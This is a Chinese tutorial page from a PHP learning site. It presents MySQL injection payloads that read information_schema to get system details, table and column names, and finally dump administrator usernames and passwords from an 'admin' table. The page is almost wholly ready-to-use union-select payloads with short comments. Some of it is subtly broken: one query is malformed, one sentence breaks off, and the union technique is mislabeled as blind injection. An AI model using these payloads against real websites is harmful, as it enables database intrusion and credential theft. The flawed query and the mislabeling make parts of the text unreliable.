来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 本文介绍MYSQL盲注的一些语句和方法学习盲注前先了解下 IFORMATION_SCHEMA 库Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有存在数据库名、数据库...
本文介绍MYSQL盲注的一些语句和方法 学习盲注前先了解下 IFORMATION_SCHEMA 库
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
|TABLES ->存储表名
|COLUMNS ->存储的字段名表 |---字段:COLUMN_NAME ->该字段的名称
########################################################################### 0x001 获取系统信息: union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()database(),0x3c62723e,database()),7,8,9 /* /* @@global.version_compile_os 获取系统版本
@@datadir 数据库路径 */
###################################################################### 0x002 获取表名 union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
/* 0x67617264656e 为当前数据库名 group_concat(table_name) 使用group_concat函数 一步获得该库所有表名 */ ######################################################################
0x003 获取字段 union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /* /* group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段 0x61646d696e ->选择一个表 0x67617264656e ->数据库名 */ #####################################################################
0x004 获取数据
union select 1,2,3 union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
/* 0x3c62723e 换行符号HEX编码 group_concat 同时获得该字段所有数据 */
from:叶少blog |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com